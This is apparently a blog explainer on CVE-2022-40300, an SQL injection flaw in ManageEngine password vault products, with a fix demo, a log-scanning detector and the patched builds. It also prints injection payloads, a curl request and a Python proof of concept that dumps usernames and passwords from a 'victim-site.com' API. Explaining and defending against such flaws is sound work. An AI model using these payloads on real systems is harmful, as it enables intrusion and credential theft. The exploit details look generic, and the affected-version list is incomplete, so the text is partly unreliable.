In the world of enterprise IT, password management is a big deal. Many companies rely on Zoho’s ManageEngine lineup—including Password Manager Pro, PAM360, and Access Manager Plus—to keep credentials safe. But in late 2022, a serious set of SQL injection vulnerabilities (tracked as CVE-2022-40300) was discovered, exposing users of these products to potential data breaches, privilege escalation, credential leaks, or even total system compromise.
This long read explains what happened, how it works under the hood, provides example code, and shows you where to learn more.
- Access Manager Plus through 4304 (before 4305)

Installations in these version ranges are affected. These products all share a large amount of backend code, making them vulnerable to the same weaknesses.
What Is SQL Injection?
SQL injection is a classic web application vulnerability. If an app takes user input and plugs it directly into a database query without enough validation, an attacker can "inject" custom SQL and make the database return or alter data the application never meant to expose, such as the stored credentials discussed below.
What’s Special About CVE-2022-40300?
Zoho’s applications are used in sensitive environments—data centers, enterprise IT, and critical infrastructure. When SQL injection vulnerabilities appear here, the stakes are high: attackers could get access to domain credentials, access secrets, or fully take over password vaults.
The specific flaws here exist in the backend Java code that handles API requests for user operations. When a user action parameter is not properly checked, raw user input goes straight into an SQL query.
In Password Manager Pro and related products, certain API actions are handled through endpoints such as:

- `/RestAPI/UserMgmtAPI`
Suppose the application is expecting a JSON input like:

```json
{
  "operation": "getUserDetails",
  "userid": "105"
}
```
But the backend builds the SQL query by concatenating `userid` without validating it:

```java
String sql = "SELECT * FROM Users WHERE id = " + request.getParameter("userid");
```
If a malicious actor sends:

```json
{
  "operation": "getUserDetails",
  "userid": "105 OR 1=1 --"
}
```
the backend constructs:

```sql
SELECT * FROM Users WHERE id = 105 OR 1=1 --
```
This will return all users—not just the one with ID 105.
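To make the difference concrete, here is an added example (not code from the original post or from ManageEngine) that runs the concatenated query the post describes next to a parameterized one against an in-memory SQLite table. The table, rows and function names are constructed for this demo and are not the product's real schema.

```python
"""Vulnerable string-built query vs. a parameterized query, side by side.
Added example; the Users table and its rows are constructed sample data."""
import sqlite3

# Constructed sample data standing in for the product's Users table.
SAMPLE_USERS = [
    (104, "alice", "pw-hash-a"),
    (105, "bob", "pw-hash-b"),
    (106, "carol", "pw-hash-c"),
]


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def get_user_vulnerable(conn: sqlite3.Connection, userid: str) -> list:
    """Mirrors the Java line in the post: user input is spliced into the SQL text,
    so whatever the caller sends is parsed by the database as SQL."""
    sql = "SELECT id, username FROM Users WHERE id = " + userid
    return conn.execute(sql).fetchall()


def get_user_safe(conn: sqlite3.Connection, userid: str) -> list:
    """Hardened form: reject anything that is not a plain integer, then bind the
    value as a query parameter. The driver never treats the input as SQL text."""
    if not userid.isdigit():
        raise ValueError("userid must be a positive integer")
    sql = "SELECT id, username FROM Users WHERE id = ?"
    return conn.execute(sql, (int(userid),)).fetchall()


def demo(userid: str):
    """Run both variants on the same input; returns (vulnerable_rows, safe_result)."""
    conn = make_db()
    vulnerable = get_user_vulnerable(conn, userid)
    try:
        safe = get_user_safe(conn, userid)
    except ValueError as exc:
        safe = str(exc)
    return vulnerable, safe


if __name__ == "__main__":
    print(demo("105"))            # both variants return only bob
    print(demo("105 OR 1=1 --"))  # vulnerable returns every row; safe rejects the input
```

The fix is two-layered on purpose: the integer check rejects malformed input early with a clear error, and the bound parameter means that even if the check were ever bypassed, the database would compare `id` against a value rather than execute attacker-controlled SQL.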
Let’s simulate a simple POST request using curl:

```bash
curl -k -X POST https://victim-site.com/RestAPI/UserMgmtAPI \
  -H "Content-Type: application/json" \
  -d '{"operation":"getUserDetails","userid":" OR 1=1 --"}'
```
If exploitable, this will dump the contents of the entire Users table!
Proof-of-Concept: A Simple Python Script
Here’s a trimmed-down example for educational purposes (never run against systems you don’t own!):

```python
import requests

url = "https://victim-site.com/RestAPI/UserMgmtAPI"
payload = {
    "operation": "getUserDetails",
    "userid": " UNION SELECT username, password, '', '' FROM Users -- "
}
headers = {"Content-Type": "application/json"}
resp = requests.post(url, json=payload, headers=headers, verify=False)
print(resp.text)
```
Change the UNION SELECT fields to match column structure.
Zoho released fixes quickly after responsible disclosure. The fixed builds are:
- Password Manager Pro 12121
- PAM360 560
- Access Manager Plus 4305
References
- NIST NVD - CVE-2022-40300
- Zoho ManageEngine Password Manager Pro Security Advisory
- SSD Disclosure
Conclusion
CVE-2022-40300 is a critical SQL injection flaw affecting some of the world’s most popular enterprise credential vaults. If you use any Zoho ManageEngine product, check your version, patch without delay, and audit your systems for signs of exploitation. Don’t let attackers get the keys to your kingdom!
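The audit step above can be partly automated. The following is an added example (not from the original post or from ManageEngine) that scans request log lines for the pattern the post describes: calls to `/RestAPI/UserMgmtAPI` whose `userid` is not a plain integer. The JSON-lines log format, the field names and the sample entries are constructed for this demo; adapt the parser to whatever your reverse proxy or WAF actually records.

```python
"""Scan constructed request logs for non-numeric userid values sent to the
affected endpoint. Added example; log format and sample lines are made up."""
import json
import re

# Constructed sample log: one JSON object per line, as a proxy might emit
# after capturing request bodies for the API path. Two lines carry the
# payloads shown earlier in the post; the others are benign.
SAMPLE_LOG = """\
{"ts":"2022-09-17T01:02:03Z","src":"10.0.0.5","path":"/RestAPI/UserMgmtAPI","body":{"operation":"getUserDetails","userid":"105"}}
{"ts":"2022-09-17T01:02:09Z","src":"203.0.113.7","path":"/RestAPI/UserMgmtAPI","body":{"operation":"getUserDetails","userid":"105 OR 1=1 --"}}
{"ts":"2022-09-17T01:02:15Z","src":"203.0.113.7","path":"/RestAPI/UserMgmtAPI","body":{"operation":"getUserDetails","userid":" UNION SELECT username, password, '', '' FROM Users -- "}}
{"ts":"2022-09-17T01:03:00Z","src":"10.0.0.9","path":"/RestAPI/Other","body":{"foo":"bar"}}
"""

WATCHED_PATH = "/RestAPI/UserMgmtAPI"
# Fields the endpoint is expected to receive as plain integers (assumption).
NUMERIC_FIELDS = ("userid",)
# Tokens that have no business inside a numeric identifier; used only to
# label the finding, since any non-digit value is already suspicious.
SQL_TOKENS = re.compile(r"(--|/\*|\b(or|and|union|select)\b|[;'\"])", re.IGNORECASE)


def classify(entry: dict):
    """Return a reason string if the entry looks like an injection attempt, else None."""
    if entry.get("path") != WATCHED_PATH:
        return None
    body = entry.get("body") or {}
    for field in NUMERIC_FIELDS:
        value = body.get(field)
        if value is None:
            continue
        if not isinstance(value, str):
            value = str(value)
        if value.strip().isdigit():
            continue  # well-formed identifier, nothing to report
        m = SQL_TOKENS.search(value)
        token = m.group(0) if m else "non-numeric"
        return f"{field} not numeric (token: {token!r})"
    return None


def scan(log_text: str):
    """Parse each line and collect (timestamp, source, reason) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; real tooling should count these separately
        reason = classify(entry)
        if reason:
            findings.append((entry.get("ts"), entry.get("src"), reason))
    return findings


if __name__ == "__main__":
    for ts, src, reason in scan(SAMPLE_LOG):
        print(ts, src, reason)
```

Flagging on "not a plain integer" rather than on a keyword list is deliberate: the allow-list check cannot be evaded by keyword obfuscation, and the keyword match only serves to make the finding readable. Correlating repeated hits from one source, as the two flagged lines from `203.0.113.7` show, is the natural next step in a SIEM.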
Stay safe, and always keep an eye on CVE trackers!
*This post is original and exclusive content. For any questions or follow-ups, leave a comment below.*
Timeline
Published on: 09/16/2022 23:15:00 UTC
Last modified on: 09/21/2022 06:17:00 UTC